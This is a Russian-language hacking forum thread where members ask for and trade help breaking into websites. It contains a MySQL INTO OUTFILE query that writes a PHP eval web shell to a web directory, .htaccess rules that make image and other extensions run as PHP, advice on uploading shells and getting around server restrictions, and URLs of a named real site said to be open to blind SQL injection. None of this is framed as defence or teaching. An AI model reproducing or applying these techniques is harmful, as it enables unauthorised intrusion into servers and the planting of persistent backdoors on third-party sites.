Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    188
    Reputations:
    92
    Есть xss на одном ресурсе, не получается определить тип.
    Создаю новость, вписываю в тело страницы
    При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет! o_O
    не подскажите, что за бред с xss?)
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Это DOM BASED
     
    _________________________
  3. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    134
    Likes Received:
    41
    Reputations:
    26
    пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка:

    я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым
    но при попытки открыть shell.png он просто скачивается.
    вообщем я хз что делать...
     
  4. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    178
    Likes Received:
    11
    Reputations:
    1
    ребят,подскажите,плз...в какую сторону копать?)...

    сканнер показывает blind-sql здесь в параметре mna :
    http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray[]=male&srch=y&srchsexarray=1&mna=-89
    http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray[]=male&srch=y&srchsexarray=1&mna=89

    здесь ошибка с раскрытием путей:
    http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray=male&srch=y&srchsexarray=1

    можно ли раскрутить это скулю или это ошибка сканнера?
     
    #20264 HeaVeNSeR, 25 Apr 2012
    Last edited: 25 Apr 2012
  5. Марок

    Марок Banned

    Joined:
    22 Apr 2012
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    мел кто дело с SFTcms v 2.0?
    Картинки заливаются, но куда, черт ногу сломит =/
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    А посмотреть уже залитые картинке не?
     
    _________________________
  7. красавец

    Joined:
    26 Jan 2012
    Messages:
    15
    Likes Received:
    4
    Reputations:
    5
    подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5


    я делаю по 2 запроса одного типа

    первый
    и второй сам шелл
    оба запроса в одну папку разумеется

    всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
    Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет


    Что ещё можно залить вместо моего htaccess ?
     
  8. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
     
  9. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    332
    Likes Received:
    177
    Reputations:
    76
    Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно)

    Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '<?php eval($_REQUEST[a]); ?>' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.php'
     
    1 person likes this.
  10. красавец

    Joined:
    26 Jan 2012
    Messages:
    15
    Likes Received:
    4
    Reputations:
    5
    мешает то что php не открывается просто так

    я пытался разумеется сначало php залить
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    ну попробуй в папку залить хтакес:
    и патом в пхп записаться уже.
     
  12. красавец

    Joined:
    26 Jan 2012
    Messages:
    15
    Likes Received:
    4
    Reputations:
    5

    Сделал вот такой запрос

    Всё равно не хочет jpg как php обрабатыватся
    простой php тоже не обрабатывается
     
  13. [ Dumi ]

    [ Dumi ] Member

    Joined:
    27 May 2009
    Messages:
    26
    Likes Received:
    66
    Reputations:
    13
    согласен.
     
    5 people like this.
  14. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    332
    Likes Received:
    177
    Reputations:
    76
    Слишком мало вводной информации. Что значит не хочет обрабатываться? 500 ошибка, предложение скачать файл или простое отображение кода без его интерпретации?

    Заливай .htaccess

    PHP:
    Options +Indexes
    php_flag engine on
    AddType application
    /x-httpd-php .ololo .phtml .jpg .html .php .php3
    AddHandler application
    /x-httpd-php .ololo .phtml .jpg .html .php .php3
    Первая строчка позволит тебе шариться по директории из веба, если вдруг у тебя нет такой возможности сейчас, что убыстрит процесс. Потом заливай последовательно в .phtml, .php, .php3

    Алгоритм - залился в формат одного вида, смотришь из веба как ведет себя файл(500 ошибка, предложение скачивания, только текст). И так по всем расширениям. От этого уже и нужно отталкиваться, а пока это гадание на кофейной гуще.
     
  15. красавец

    Joined:
    26 Jan 2012
    Messages:
    15
    Likes Received:
    4
    Reputations:
    5
    Вот если заливаю прямо php файл то сейчас вывалилось 500 (как и раньше)
    если jpg то пишет что поврежденное изображение (если открыть в Осле то виден код как будто txt)
    если другие форматы то тоже 500
     
  16. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    У меня такая проблема , раньше заливал шелл через ftp на сайт все норм было , сейчас мы видим вот такую картину Что мне делать ? и как обойти ?
     
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Попробуй AddType application/x-httpd-php .php в .htaccess в данной папке впихнуть. На изображении же четко и ясно видно в чем дело - файл не исполняется а вываливает php-html код как есть на страницу. Значит сие что обработчик типа убрали для данной папки. Если на апаче включена опция, позволяющая серверу перопределяться дочерними правилами .htaccess , то по идее должно сработать. В случае, если базовый конфиг апача или корневой .thaccess задают для данной директории обдуление .php и не позволяют переопределяться для .htaccess то в данной директории скорее всего ничего не сделаешь.
     
    1 person likes this.
  18. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    не помогло.
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Проверь, в шелл.php есть теги <?php :D
     
    _________________________
  20. RusPoker74

    RusPoker74 Banned

    Joined:
    26 Feb 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, как имея шелл на 1 сайте, узнать урлы всех сайтов сервака.
    То есть есть доступ в другие папки (сайты), но по названиям не понятно, что это за адреса.

    Варианты посмотреть файлы robots, htaccess, configuration, sitemap и найди myphpadmin не предлагать ) Это само собой..

    Заранее огромное спасибо!
     
Loading...
Thread Status:
Not open for further replies.